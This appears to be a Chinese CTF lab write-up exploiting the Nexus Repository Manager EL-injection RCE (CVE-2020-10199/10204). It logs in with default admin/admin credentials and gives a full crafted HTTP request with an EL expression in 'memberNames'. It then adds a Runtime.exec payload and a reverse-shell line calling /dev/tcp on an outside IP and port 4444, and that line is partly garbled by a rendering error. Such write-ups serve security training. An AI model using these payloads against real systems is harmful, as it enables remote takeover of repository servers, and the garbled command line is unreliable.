nexus 远程代码执行(CVE-2020-10199/10204)

漏洞介绍

名称: nexus 远程代码执行 (CVE-2020-10199/10204)

描述: Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。 CVE-2020-10199的漏洞需要普通用户权限即可触发,而CVE-2020-10204则需要管理员权限。两个漏洞的触发原因均是不安全的执行EL表达式导致的.

影响版本

Nexus Repository Manager OSS/Pro 3.x <= 3.21.1

解题过程

1.打开靶场

1

2.登录 弱口令 admin/admin

2

3.抓包获取登录后的cookie及csrf属性;

3

4.输入下面的包,执行命令的地方在最下面的"memberNames"中,下面这个包执行的是3个233相乘的表达式,通过这个表达式能否执行来判断漏洞存在与否

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 靶场ip:端口
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: 靶场ip:端口
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: 靶场ip:端口
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=cedf848f-d881-4b58-ac24-9e9c3ece40bc
Connection: close    

{
  "name": "internal",
  "online": true,
  "storage":
 {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group":
 {
    "memberNames": ["$\\A{233*233*233}"]
  }
}

5.然后将上面数据包中的NX-ANTI-CSRF-TOKEN 和Cookie 的值修改为第2步中所抓数据包中对应的值,然后将数据包发出去

4

注意:数据包和头之间要空一行,数据包要和下图中一样有明显的颜色区分才说明发挥作用了,如果都是黑色的说明没有起到作用,可以自己微调一下,改改空格之类的。 5

可以看到命令被成功执行了

6.于是将"memberNames"中的值改成命令执行的pyload,再次放包,下图中这个情况说明命令被成功执行了,

$\A{’’.getClass().forName(‘java.lang.Runtime’).getMethods()[6].invoke(null).exec(‘touch /tmp/success’)}

但是换成ls /tmp 之后,命令执行的结果并不会回显在返回的数据包中,所以想要获得flag,最方便的还是反弹shell了。

7.将命令修改为反弹shell的命令,服务器进行监听

“KaTeX parse error: Expected '}', got 'EOF' at end of input: …in/bash -c bashIFS$9-i>&/dev/tcp/82.156.16.168/4444<&1’)}”

成功获得flag。 6

漏洞修复 目前,官方已发布新版本修复了该漏洞,请受影响的用户升级到安全版本。

下载地址:https://help.sonatype.com/repomanager3/download/

注:修复漏洞前请将资料备份,并进行充分测试。